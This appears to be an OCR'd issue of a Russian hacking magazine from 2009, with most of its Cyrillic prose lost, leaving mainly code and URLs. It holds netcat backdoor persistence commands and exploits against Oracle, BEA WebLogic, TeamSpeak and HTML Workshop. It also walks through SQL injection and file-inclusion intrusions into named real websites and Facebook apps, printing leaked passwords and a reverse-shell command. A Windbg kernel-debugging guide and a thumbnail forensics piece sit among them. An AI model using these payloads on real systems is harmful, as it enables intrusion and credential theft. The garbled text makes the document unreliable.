:
, , , . ,

- .

.
, .
Disk Cryptor, ,
. :
1. http://diskcryptor.net .
2. .
3. ( ) Encrypt.
4. , (
) ,
( ).
5. Disk
Cryptor. ( Mount),
.

6. -
, . :).
7. ,
.
, , ,
. , , ,
. , .

: NETCAT

:
netcat,
.
1. netcat :
reg add HKLM\Software\Microsoft\Windows\
CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe
d 192.168.1.70 1234 e cmd.exe"

netcat
1234 . , , .

.
2. Windows Service. , netcat
, , ,
:
sc create Network Connections Service binPath= "cmd /K
start c:\nc.exe d 192.168.1.70 1234 e cmd.exe" start=
auto error= ignore

SC (
) Network Connections Service. start=
auto , ,
error=ignore -
. ,

034

netcat

[SC] CreateService SUCCESS. , ,


.
3. netcat Windows Task Sheduler ( ). , netcat , .
Windows .
net start schedule
at 12:00:00 /every:m,t,w,th,f,s,su ""c:\nc.exe d
192.168.1.70 1234 e cmd.exe""

( ), 12:00:00,
.
X 02 /122/ 09

>>

: NETCAT
:
, netcat . :
nc z n v w 1 192.168.1.100 1-1024
nc n v w 1 z 192.168.1.100 20 21 22 25 80 8080

:
-z (zero-input/output mode) (
);
-n (numeric-only, , IP-, );
-w ( ).

netcat

: IP- ,
:
Metasploit Decloak (decloak.
net). ,
.
:

md5("secret" . $_SERVER['REMOTE_ADDR'] . $_
SERVER['REMOTE_PORT'] . time() . secret);

, ,
:
<iframe src="http://decloak.net/decloak.html?cid=<
>"></iframe>

:
decloak.net/report.html?cid=<>&format=text.
z

JAVA; Quick Time,



Word- IP-

direct
;
Word-
-,
.

DNS- ;

Flash-;

Itunes,

itms,
URL.


Decloaking
Engine Remote API, .
, :
X 02 /122/ 09

035

>>

SKVOZ

01

ORACLE

>> Brief
Oracle
40 . , : WebLogic Server 7.0/8.0/10.0, Oracle 9i/10g/11g, E-Business
Suite 11i . ,
, unbreakable,
, . ,
,
( ). CVSS2 Risk
Score Microsoft Windows (10) / Linux Unix (7,5).
Oracle ,
.

, ,

if (strncmp($msg[0], "Error:", 6))
{
// Set the cookie up.
setcookie("ora_osb_bgcookie", "");
setcookie("ora_osb_lcookie", "");
$ora_osb_bgcookie = "";
}
// Reset DEBUG_EXEC.
$DEBUG_EXEC = $dtmp;
}
header("Location: /login.php?clear=yes");

ORACLE SECURE BACKUP (10.1.0.3 <- 10.2.0.2)


>> Targets:
, .

(login.php).
PHP-, ,
, .
login.php
obt.exe. , ,
:

>> Exploit
,
,
- .
:

if (strlen($ora_osb_bgcookie) > 0 && $button ==


"Logout")
{
// Turn DEBUG_EXEC to off
$tmp = $DEBUG_EXEC;
$DEBUG_EXEC = "no";

https://<target>/login.php?clear=no&ora_osb_
lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cm
d.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.
txt+;

>> Solution
WEB-,
. 10.2.0.3 .

// Teminate the connection.


$qr_command = "$rbtool --terminate $ora_osb_
bgcookie-$ora_osb_lcookie";
$msg = exec_qr("$qr_command");

02

// exec_qr PHP- popen,


, $qr_command
(/bin/sh, cmd.
exe) -

>> Brief
HTTP-

WEB-. -

036

APACHE CONNECTOR
ORACLE BEA WEBLOGIC SERVER

X 02 /122/ 09

>>

(
)
()

DoS-. Java POST /.jsp .


- :
$a = "A" x 6000;
#
# POST
"POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";

>> Targets
BEA WebLogic Server 6.x,7.x,8.x,9.x, 10.x

>> Exploit
, ( 2008),
KingCope. milw0rm.
com/exploits/6089.

, help ver
./tcpquerydocs/ ver.txt.
. :
telnet localhost 51234
help ../../../../boot.ini\0 (\0 -)

:
server.log
TS
server.dbs
TS
../../../../../boot.ini
../../../../../etc/passwd
../../../../../usr/local/apache/conf/httpd.conf etc.

>> Targets
Windows/Linux/Unix.

>> Solution
:
ftp://anonymous:dev2dev%40bea%2Ecom@ftpna.bea.com/pub/
releases/security/WLSWebServerPlugins1.0.1136334-Apache.zip

>> Exploits
Antichat.ru (forum.antichat.
ru/showthread.php).

03

>> Solution
-

TEAMSPEAK SERVER
<= 2.0.23.17 REMOTE READ FILE

Oracle

>> Brief
, , HeiseSecurity (heise-online.co.uk/security/Vulnerability-inTeamSpeak-2-server--/news/93734),
. , c411k
. ,
TeamSpeak . , TS , PLESK/Cpanel,

. TS
TCP-:
8767
14534 WEB-
51234 TCQQuery Admin
X 02 /122/ 09

037

>>

Windows Vista

thumbcache_96.db (
BMP)

forum.teamspeak.com/showthread.php?t=38515.

MICROSOFT HTML WORKSHOP


<= 4.74 UNIVERSAL BUFFER OVERFLOW
>> Brief:
,
shellhunting, 2k, XP, Vista . , shellhunter
, .
- SEH-:
004004C6
004004C7
004004CA
004004CB
004004CD
004004CF
004004D2
004004D4

$
.
.
.
.
.
.
>

58
POP
EAX
83E8 3C
SUB
EAX,3C
50
PUSH
EAX
6A FF
PUSH
-1
33DB
XOR
EBX,EBX
64:8923
MOV
DWORD PTR FS:[EBX],ESP
EB 05
JMP
SHORT prog.004004D9
E8 EDFFFFFF CALL
prog.004004C6

- .
Shellhunter.
#/----------------Advanced Shellhunter Code---------------\
#01D717DD EB 1E
JMP SHORT 01D717FD
|
#01D717DF 83C4 64
ADD ESP,64
|
#01D717E2 83C4 64
ADD ESP,64
|
#01D717E5 83C4 64
ADD ESP,64
|
#01D717E8 83C4 64
ADD ESP,64
|
#01D717EB 83C4 64
ADD ESP,64
|

, -,
, - . Shellhunter
,
,
:
my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\
x42\x42\x42" x 64;
my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\
x42\x42\x42\x42" x 64;
my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\
x42\x42\x42\x42\x42" x 64;
my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\
x42\x42\x42\x42\x42\x42" x 64;

038

()

- Windows,
? , 280 . ,
reverse/bind -.
:
#01D7181B B8 12121212
#01D71820 6BC0 02
#01D71823 BA D0FAFD7F
#01D71828 83C7 20
#01D7182B 893A
#01D7182D 3907
#01D7182F ^75 F7
#01D71831 83C7 04
#01D71834 6BC0 02
#01D71837 3907
#01D71839 ^75 E0
#01D7183B 83C7 04
#01D7183E B8 42424242
#01D71843 3907
#01D71845 ^75 D4

MOV EAX,12121212
IMUL EAX,EAX,2
MOV EDX,7FFDFAD0
ADD EDI,20
MOV DWORD PTR DS:[EDX],EDI
CMP DWORD PTR DS:[EDI],EAX
JNZ SHORT 01D71828
ADD EDI,4
IMUL EAX,EAX,2
CMP DWORD PTR DS:[EDI],EAX
JNZ SHORT 01D7181B
ADD EDI,4
MOV EAX,42424242
CMP DWORD PTR DS:[EDI],EAX

edi 24242424
42424242.
JNZ SHORT 01D7181B
#01D71847 83C7 04
#01D7181B B8 12121212
#01D71820 6BC0 02

ADD EDI,4
MOV EAX,12121212
IMUL EAX,EAX,2

eax 424242. :
#01D7182B
#01D7182D

893A
3907

MOV DWORD PTR DS:[EDX],EDI


CMP DWORD PTR DS:[EDI],EAX
X 02 /122/ 09

>>
:
01D71834 6BC0 02
#01D71837 3907

IMUL EAX,EAX,2
CMP DWORD PTR DS:[EDI],EAX

eax 2 ( 484848). :
#01D7183E B8 42424242
#01D71843 3907
#01D71845 ^75 D4

MOV EAX,42424242
CMP DWORD PTR DS:[EDI],EAX
JNZ SHORT 01D7181B

: , Shellhunter seh-handler ( , )
, shellhunter shellcode,
. ,
. ,
. , (masm32\bintodb.exe) MASM ,
:
686
.mmx
.model flat,stdcall
option casemap:none
include
gdi32.inc
include kernel32.inc
include
user32.inc
include shell32.inc
include advapi32.inc
include
windows.inc
include ntdll.inc
includelib gdi32.lib
includelib kernel32.lib
includelib user32.lib
includelib shell32.lib
includelib advapi32.lib
includelib ntdll.lib
.const
.data?
.data
include 1.txt (,
bin2db)
DefaultInternet
db Hello,0
.code
start:
invoke MessageBoxA, 0, offset DefaultInternet, NULL,
MB_OK
invoke ExitProcess, 0
end start

OllyDbg,
( New Origin Here).
-.

>> Targets:
Windows 2k, XP, Vista
>> Exploit
http://milw0rm.com/exploits/7727.
(s.hpp).
:
X 02 /122/ 09

[OPTIONS]
Contents file=A
Index file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA? a-da-da-da-da-da-da-da-da-da-T3
? i:?
Xa?<Pj 3-de#? ??
kL ? a e:9u?a kL 9u?a
BBBB9uLa ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAo@
[FILES]

OPTIONS Index File.

>> Solution:
.

>> Brief
(thumbnails) , . Windows ME/2000/XP/2003
Thumbs.db, . Windows Vista, .

Unix-like (, GNOME).
Windows Vista GNOME (Linux)
.
Windows VISTA . : \Users\<_>\AppData\Local\
Microsoft\Windows\Explorer. :
thumbcache_idx.db
thumbcache_NN.db, NN
thumbcache_sr.db

thumbcache_idx.db

thumbcache_NN.db .
IMMM.
thumbcache_NN.db
CMMM. , ,
BMP PNG, (chunks) . NN ( )

039

>>

/ STEP@GAMELAND. RU/

(foremost)

.
, , .
,
.
Windows Vista
:
1. , ( , CD ..);
, EFS, ;
2. ,
EFS.
, :
1. ,
;
2.
;
3. .
, Windows
, ( ):
TrueCrypt 6.1a (
, ,
);
BestCrypt v. 8 (
, ,
);
PGP Desktop 9.9 (
).
(, DM Thumbs www.dmthumbs.
com), , (, foremost http://
foremost.sf.net hachoir-subfile http://hachoir.org).
GNOME (~/.thumbnails/normal). PNG,
( ,
..). ,
.
, -

TrueCrypt:

040
40

$ HACHOIR-METADATA ~/.THUMBNAILS/NORMAL/
0D97AFDC637AC86D75D13E72172DC77C.PNG
METADATA:
Image width: 128 pixels
Image height: 122 pixels
Bits/pixel: 24
Pixel format: RGB
Compression rate: 1.6x
Compression: deflate
Producer: GNOME::ThumbnailFactory
Comment: Thumb::Image::Width=779
Comment: Thumb::Image::Height=744
Comment: Thumb::URI=file:///media/truecrypt1/123.jpg
Comment: Thumb::MTime=1216153400
MIME type: image/png
Endian: Big endian

, CD:
$ hachoir-metadata ~/.thumbnails/normal/f34c0ff3299e0a0
b87a4a9a3a4d994ff.png
Metadata:
Image width: 128 pixels
Image height: 96 pixels
Bits/pixel: 24
Pixel format: RGB
Compression rate: 1.5x
Compression: deflate
Producer: GNOME::ThumbnailFactory
Comment: Thumb::Image::Width=3264
Comment: Thumb::Image::Height=2448
Comment: Thumb::URI=file:///media/
%D0%BE%D0%BA%D1%82%2025%202006/P1010043.JPG
Comment: Thumb::MTime=1161800029

, ,
.
-
(fuf@itdefence.ru). :). z
X 02 /122/ 09

>>

/ KOMAROV@ITDEFENCE.RU /

facebook.com

. , ,
. , ? ,
. facebook.com
.
, , .
Facebook.com 2004
, - a .
face book.
,
Thefacebook.com. Facebook.
com . ,
2007 Facebook 34 . , Microsoft,
!
2007 , Microsoft 1,6%
Facebook 240 .
, 2011 .
!

(HAPPY) CRAB, CHICKEE, PUPPOG !


application- Flufffriends.com.
Fluff
: apps.facebook.com/fluff/ffriends_splash.php. ,
, .

042

.
http://apps.facebook.com/fluff/fluffbook.
php?id=654626570

id='111111111,
, , - ,
.
, :
http://apps.facebook.com/fluff/art.
php?id=654329372+and+1=-1+union+select+1,2,3,4,5,6,7,8
,9,0,1,2,3,4,5,6,7,8,9--

! :
http://apps.facebook.com/fluff/fluffbook.php?id=654626
570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,58,
32),user(),database(),version()),4,5,6,null,8,9,10,11,
12,13,14,15,16,concat(user,%200x3a,%20password),18,19
,20,21+FROM+mysql.user+limit+1,1 (
)

!
X 02 /122/ 09

>>

Apache

! , ,

/etc/passwd

root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
(Maatkit: a toolkit of utilities and tools for MySQL)

, ,
:
/etc/passwd (2f6574632f706173737764)
http://apps.facebook.com/fluff/fluffbook.php?id=65462
6570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,5
8,32),user(),database(),version()),4,5,6,null,8,9,10,
11,12,13,14,15,16,load_file(0x2f6574632f706173737764),
18,19,20,21- /etc/httpd/conf/httpd.conf (2f6574632f687474706
42f636f6e662f68747470642e636f6e66)
http://apps.facebook.com/fluff/fluffbook.php?id=654626
570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,58,
32),user(),database(),version()),4,5,6,null,8,9,10,11,
12,13,14,15,16,load_file(0x2f6574632f68747470642f636f6
e662f68747470642e636f6e66),18,19,20,21- /etc/php.ini (2f6574632f7068702e696e69)
http://apps.facebook.com/fluff/fluffbook.php?id=654626
570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,58
X 02 /122/ 09

,32),user(),database(),version()),4,5,6,null,8,9,10,11
,12,13,14,15,16,load_file(0x2f6574632f7068702e696e69),
18,19,20,21- /etc/hosts (2f6574632f686f737473)
http://apps.facebook.com/fluff/fluffbook.php?id=65462
6570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,5
8,32),user(),database(),version()),4,5,6,null,8,9,10,
11,12,13,14,15,16,load_file(0x2f6574632f686f737473),1
8,19,20,21--

hosts ,
. :
127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

, , 192.168.1.168.
/etc/my.cnf (2f6574632f6d792e636e66)
http://apps.facebook.com/fluff/fluffbook.php?id=654626
570+and+1=2+union+Select+all+1,2,CONCAT_WS(CHAR(32,58
,32),user(),database(),version()),4,5,6,null,8,9,10,1
1,12,13,14,15,16,load_file(0x2f6574632f6d792e636e66),
18,19,20,21--

043

>>

info

.
,


(
).
,
.



,
Facebook
Ruby
on Rails
:
/home/ridetech/
rails/community/
public/facebook/
snowreports/
report.php.



.
MSN
,
,
MSN/Google,
.

: serversniff.
de/content.php?do=
subdomains.


!

Ruby on Rails

MySQL

:
#SERVER 2 IS THE MASTER FOR DB1 AND SLAVE FOR
DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=192.168.1.166
#master-user=slave_user
#master-password=peapie1212
#master-connect-retry=60
replicate-do-db=fluff1


:
,
.
.

1) http://apps.facebook.com/snowago/area.php?areaid=30
3021+AND+1=2+UNION+SELECT+0,version(),2,3,4--

Database: affinispac_fb
User: affinispac_fb@localhost
Version: 5.0.67-community

#log-slave-updates
expire_logs_days = 14

2) http://www.chinesezodiachoroscope.com/facebook/
index1.php?user_id=663991991%20AND%201=2%20UNION%20SE
LECT%200,1,2,3,4,5,6,7,8,CONCAT_WS(CHAR(32,58,32),use
r(),database(),version()),10,11,12,13,14--&zodiac=1


Facebook .

. , apps.facebook.com/
snowago/area.php?areaid=303021+AND+1=2+UNI
ON+ALL+SELECT+0,1,2,3,4--
affinispace.com/facebook/snowago/area.php?areaid=30
3021+AND+1=2+UNION+ALL+SELECT+0,1,2,3,4-- ,

phpinfo (affinispace.
com/facebook).

044

/etc/passwd

> plucky@localhost : facebook : 4.0.13-log

3) http://apps.facebook.com/newastrology/newastro.
php?uid=1387771663+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6
,7,8,9,CONCAT_WS(CHAR(32,58,32),user(),database(),ver
sion()),11,12,13,14,15,16,17,18,19,20,21--

4) http://apps.facebook.com/ridertech/location.php?id=
7449+AND+1=2+UNION+SELECT+0,CONCAT_WS(CHAR(32,58,32),
user(),database(),version()) ,2,3,4,5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23-X 02 /122/ 09

>>

KedaH3.exe IDA Pro 5.3 (


)

, phpinfo() .
,

tion_schema.columns+limit+1,2

paypal_ipn.

, ? -!
. . ,
. :
http://apps.facebook.com/fluff/fluffbook.php?id=654626
570+and+1=2+union+Select+all+1,2,3,4,5,6,null,8,9,10,1
1,12,13,14,15,16,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),
18,19,20,21+FROM+information_schema.schemata

3 , .
MySQL:
SELECT schema_name FROM information_schema.schemata
(MySQL >= v5.0); :
SELECT distinct(db) FROM mysql.db

, sqlmap. :
mysql, fluff1, fluff2. fluff2
paypal_ipn :
http://apps.facebook.com/fluff/fluffbook.php?id=65
4626570+and+1=2+union+Select+all+1,2,3,4,5,6,null,
8,9,10,11,12,13,14,15,16,concat(table_name,table_
schema,column_name,0x1e,0x20),18,19,20,21+FROM+informa
X 02 /122/ 09

, .
sqlmap/sqlninja.
http://apps.facebook.com/fluff/fluffbook.
php?id=654626570+and+1=2+union+Select+all+1,2,CO
NCAT_WS(CHAR(32,58,32),user(),database(),versio
n()),4,5,6,null,8,9,10,11,12,13,14,15,16,concat
_ws(0x3a,user,txn_id,valid_ipn,payment_status,mc_
gross,mc_fee,mc_currency,time,receipt_id,payer_
id,payer_email,first_name,last_name,address_
name,address_street,address_city,address_state,
address_zip,address_country,address_country_
code,residence_country,payment_date,payment_
fee,payment_gross,quantity,payment_type,payer_status,txn_
type,custom,duplicate),18,19,20,21+FROM+fluff2.
paypal_ipn+limit+0,1

, , . !


,
. , ,
Facebook. , ,
, -
.z

045

>>
S4AVRD0W
/ S4AVRD0W@P0C.RU /


AIST NETCAT
CMS

, , CMS.
. ,

. , ,
.
,

NetCat 3.0 Extra. black-box, , ,
grey-box
white-box. , ,
Demo- . - , , CMS .

- Next.
,
.


, NetCat Zend. .
, dezend
( )
, CMS .

046

,
: magic_quotes_gpc ,
.htaccess,
web-.
/netcat/vars.
inc.php, .
$SHOW_MYSQL_ERRORS
On. php.ini,
display_errors display_startup_errors On,
error_reporting E_ALL & ~E_NOTICE. apache. ,
, MySQL.
echo "$query<br>";
sql_mysql.php, query{}. , , . ,
NetCat!
, NetCat .
/about/=1' You have
X 02 /122/ 09

>>

CMS

an error in your SQL syntax.


SQL-
(Blind SQL Injection). ,

- , . ,
:
/about/=1'/**/OR/**/EnglishName='profile'
/**/AND/**/1=1 web-
HTTP 302 Found , TRUE,
/about/=1'/**/OR/**/EnglishName='profile'
/**/AND/**/1=2 web- : HTTP 404 Not
Found, FALSE.
if(), ascii(), substring((SELECT...))
LIKE,
,
ACL. , File_priv,
web-shell, .
, -,
CMS,
, .
(magic_quotes_gpc) NetCat
.

( ,
),
.



,
.
.
( ).
X 02 /122/ 09

Blind SQL Injection

,
PHP (, rats).
false positive
,
.
.
.
(

,
). .
,
. , ,
. ,

(Credential/Session Prediction)
(Weak Password Recovery
Validation) .


. , grep/egrep.
,
. , ,
, , .
, grep -R -i "header[ (]" * |
grep -i Location | grep "\$" HTTP-,
header().
-
.

dvd

poc-
blind SQL Injection

benchmark() .

warning
!

! ,

!

047

>>

Cross-site Scripting

info



,

.
CMS

,

register_globals,

-
,
, fopen(),
include(), etc.


.

links
:
www.owasp.org
forum.antichat.
ru/thread35207.html

048

HTTP Response Splitting

("='\"\.\$_", "=\"\./<?=(
isset(\$_" ..)
.
, , .

. , /netcat/
modules/netshop/post.php?system=../../../
../.htaccess%00,
.htaccess, web-. ,
NetCat client-side,
. ,
.

NETCAT
,
, . ,

,
.
.
, CMS (
/netcat/modules//).
(
register_globals),
- , ,
fopen(),
include(), etc
. , -,
web-,
,
.
.
SQL Injection
/netcat/modules/poll/index.php, .
:
X 02 /122/ 09

>>

KERNEL MODE VMWARE

, .
, , Visual Studio IDA,
. , . , .
Windbg

, DLL.
VMware,
( ,
).
, .
( ) :
,
(host), (target).
SoftICE,
Visual SoftICE Windbg ( ).
,
,
pipe c host-.


:
. Compuware Visual SoftICE Windbg , Windbg :

050

Windbg NT . Windbg Microsoft NT;


Windbg ( DLL ),
;
;

(workspace ~ );
host-target , VMware.


,
() ,
, host- target
.
target-. , ,
target- host.
(Ctrl-D). Add
Serial Port. Output to named pipe. ( ) This
end is the server The other end is an application, Connect at
power on. , Yield CPU on poll.
X 02 /122/ 09

>>

KedaH3.exe

blind SQL Injection benchmark()

File Including

list( $ProtectIP, $ProtectUsers ) = $db-> get_row ( "SELECT


ProtectIP, ProtectUsers FROM Message".$classID." WHERE
Message_ID={$PollID}", ARRAY_N );

, . ,
$PollID (register_globals
), $classID, , , . Message1
ProtectIP ProtectUsers. ,
$PollID, ,
.
, , ,
$classID.
, , , . ,
/netcat/modules/poll/
?cc=62&PollID=1, MySQL .
. , , , , , benchmark().
, : /netcat/modules/poll/?cc=62&
=62&PollID=3/**/AND/**/1=if(1=2, benchmark(1,benchmar
k(2000000,md5(now()))),0) FALSE
. :
/netcat/modules/poll/?cc=62&PollID=3/**/AND/**/
X 02 /122/ 09

blind SQL Injection

1=if(1=1,benchmark(1,benchmark(2000000,md5(now()))),0)
TRUE,
benchmark() , web-,
5-10 . - .
POC- ( ), blind SQL Injection.
-
(: ) NetCat.


rainbow-tables (, , MySQL-,
hashcrack.com).

server-side CMS
. , ,
web-. , :).
. ! z

049

>>

Windbg

SymbolRetriver DriverStudio

target-.
, boot.ini .
, ,
: /debug
/debugport=com1 /baudrate=115200.
boot.ini :
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft
X 02 /122/ 09

Windows XP Professional" /noexecute=optin /fastdetect


/sos
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft
Windows XP Professional" /fastdetect /sos /debug /
debugport=com1 /baudrate=115200

[debugger enabled].
checked build ()
. , checked build ,
ntoskrnl hal (
, , -

051

>>

Cross-site Scripting

Boot- ,

- , ACPI).
?
(ntoskrnl hal) ASSERT,
/

,


()
ntoskrnl hal. , ,
(, ntoskrnl) Version, Internal Name ( ). Microsoft checked- NT,
, hal.chk ntoskrnl.chk.
SystemRoot\system32. boot.ini /KERNEL=ntoskrnl.chk /HAL=hal.chk.
, :
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft
Windows XP Professional [Checked Build]" /fastdetect
/sos /debug /debugport=com1 /baudrate=115200 /
KERNEL=ntoskrnl.chk /HAL=hal.chk

kernel mode
. , DEP, ,
PAE- , ntkrnlpa. , HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management, PhysicalAddressExtension.




. ( 150 250 MB) Microsoft
(, ntoskrnl).

052

Module List, ,

. , Debugging Tools for Windows,
symchk. (,
), :
"c:\Program Files\Debugging Tools for Windows\
symchk" /r D:\Work\SymbolsShare\EXE\ /s srv*D:\Work\
SymbolStorage*http://msdl.microsoft.com/download/symbols

,
symchk. ( ) D:\Work\SymbolsShare\
EXE\ , .
D:\Work\SymbolStorage . D:\Work\SymbolStorage
, windbg.
Compuware
X 02 /122/ 09

>>

Driver Studio SymbolRetriver,


.
Microsoft symbols storage ( ):
,
NT,
. . (symbol server),
.
(pdb-), ( symsrv.dll) Windbg ( dbghelp.dll)
.
. -
symsrv*symsrv.dll*CacheStore*Server (symsrv*symsrv.dll
srv, ,
srv*LocalPath). _NT_SYMBOL_PATH,
.
Microsoft ( ), :
srv*C:\storage*http://msdl.microsoft.com/download/
symbols.

WINDBG
Windbg (workspace ~ ). Windbg :
(
). :
(base workspace). , Windbg
, .
(default usermode workspace). ,
.
(default kernel-mode).
.
- (processor-specific workspace).
target-.
X 02 /122/ 09


x86, Itanium x64.
Windbg
,
. exe . , ,
( ).
, . windbg
.
,
.
,
. ,
. (,
, -).

.

( ), ( ,

), .
, .
. ,
.

Windbg.
.
GUI Windbg
:
Windbg ;
Windbg ;
, ,
(dock) (float);
;
(calls window);
(watch window);
.
Windbg

. Windbg
, exe-, , , () .
(w)main () .

053

>>

Cross-site Scripting

, ,
,
, , .
.
( target-), ,
, .
VMware Windbg :
k com:port=\\.\pipe\com_1,pipe.

,
. NT VMware .
,
(
). ,
.
, .

, (initial
breakpoint). , ,
, ,
Windbg b.

ExpInitializeExecutive ( , DriverEntry boot
). Windbg ,
( HAL),
/break boot.init. HAL ,
, (
HalInitSystem HalpGetParameter DbgBreakPoint).
.
, Start SERVICE_
BOOT_START, boot.ini /break.
( /break). Debug Modules.
, DriverEntry ( ), , : bp driver!DriverEntry, driver . ,
unresolved ( bl).

DriverEntry, ,
(

054

checked- .pdb- Windbg


). , ,
-, checked , -,

( l+t). , Windbg,
( .sympath+ Path File Symbol File Path),
.reload driver_name, driver_name
.
, ,
. ,

(F9). Windbg asm
, disassembly. .
, bp `src_file:line_num`,
src_file line_num ,
. , ,
bp addr. ,
<F9>. , ,
<F5> (g ).
, target- . ,
<F5>, Debuggee is running,
. Watch-.
target- ,
Break ( <Ctrl+Break>).
target-.
host-target , . Windbg VMware
.
, DebugBreak. int 0x3. ,
Windbg.

?!
, . kernel mode
, Windbg VmWare.
. . z
X 02 /122/ 09

>>
SPYDER
/ SPYDER@LIVE.RU /

, - ,
. ,
. , ,
, . .
.
.
WELCOME TO PENNSYLVANIA
iframe-,
. www.philadelphiaweekly.com
85 ,
, , 2
25 . -
: , ,
.
(2 )
,
.
. ,

.

10-
:
http://www.philadelphiaweekly.com/listings/?this_page=

056

../../../../../../../../../../etc/passwd

. , ,
, http-,
-, access_log:
http://www.philadelphiaweekly.com/listings/?this_page=
../../../../../../../../../../etc/httpd/access_log

.
,
, . , SQL-Injection (
, ).
:
http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11

:
X 02 /122/ 09

>>

. ...

http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,version(),9,10,
11

(- ).
, . , ,
. :
http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,cast(version()+a
s+binary),9,10,11

, 4.1.12-STANDARD: information_
schema, . ,
! :

gif-

, - .htaccess. ,
, , , ,
. , .
.
:
http://www.philadelphiaweekly.com/listings/?this_
page=../admin/.htaccess

.htaccess ,
rpadmin insue, /etc/httpd/.htpasswd:
http://www.philadelphiaweekly.com/listings/?this_page=
../../../../../../../../../etc/httpd/.htpasswd

,
http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,cast(version()+a
s+binary),9,10,11+from+users

. .
, :
http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,pword,9,uname,1
1+from+users
mhalloran

nono5150

- .
. , ,
:
http://www.philadelphiaweekly.com/admin
X 02 /122/ 09

login:DES(password)

, - ( ).
20 :
insue:showmeth

, , php-. ,
, sql-.
login Login or password is invalid.
, ,
sql-:
http://www.philadelphiaweekly.com/print_friendly.
php?id=-11+union+select+1,2,3,4,5,6,7,pword,9,uname,11
+from+users+limit+1,1

057

>>

. -

, .
:

mcobb:tango

, :

http://www.philadelphiaweekly.com/listings/?this_
page=../images/issues/1969-12-31/large/img_16639_10_
1.gif

"Sign as mcobb"

ANTICHAT-Shell.

,
.
,
,
. , ,
, , ..
(- ).
,
. php-,
, .jpg .gif. .
, , , include(),
include_once(), require() require_once() ,
, php-, mp3, avi .gif. .gif- . paint (
), 1x1 , . , wordpad
php-. .gif
, .
gif.
:


,
.
2.4 , ,
uname-a ,
2004 . , , , .
netcat, :
nc -l -p 22224 -e /bin/sh &

22224 . , :
netcat -v www.philadelphiaweekly.com 22224

.
.
:
nc -l -p 22224

www.philadelphiaweekly.com :
http://www.philadelphiaweekly.com/images/issues/196912-31/large/img_16639_10_1.gif

058

nc -v www.dedik.com 22224 -e /bin/sh &


X 02 /122/ 09

>>

KedaH3.exe IDA Pro 5.3 (


)

KedaH3.exe

RST MySQL

!
, local root exploit :
/bin/sh sploit

killed

, , .
iframe
. , ,
-, , -, .
. db_connect_
details.php, .
, .
,
, . , ,
.
. 8. .
www.gofuckyourself.com, . , , , -
- .
, , , , .
. -r---r-xt,
, - , .
. /admin/
head.html, , :
no muthafucka' go fuck YOURself

,
.
X 02 /122/ 09

MYSQL
, , ,
.. db_connect_details.php,
mysql ,
MySQL,
.
,
. .
pw_authors.
fname lname. ,
50 . !
:
ALTER TABLE pw_authors CHANGE lname lname varhcar(250)

250 ,
. .
,
, .htaccess IP .
, .


1. , php-.
, .
2.
touch.
3. , iframe-,
css-, .
4. POST.
5. :). z

059

>>
R0ID
/ R0ID@BK.RU /


:DX AJAX TEXT SHELL
: *NIX/WIN
:DX

AJAX -

;
MySQL
, ;
MySQL- ,
, MySQL (
set_time_limit);
,
, login:pass email - ;
MySQL- -
( );
.
, , php,
cmd MySQL .

:).

- - (
z:)).
.
-
, , ,
:
1. ;
2. ( Safe_Mode,
, etc);
: PHP PROXY SERVER
3. (php/perl/etc);
: *NIX/WIN
4. .
: DR.Z3R0
DX Ajax Text
Shell, DX.
PHP-
AJAX ( ),

POST-, , , .

:
- :). ,
-
AJAX, UTF-8;
.
POST-;
, , PHP Proxy
:
Server Dr.Z3r0.
,
.
, , , (, :))
, , chmod, touch;
(
. );
IP ,
utf-8 , , .
windows-1251;

; :
php-;
cmd
$set['port']=3333;//
( );

060

$set['mxconnect']=5;//

$set['lenpack']=10240;//max /
/ (/)
$set['dishost']='microsoft.com';//
, ,

$set['usagent']='Mozilla/5.0 (
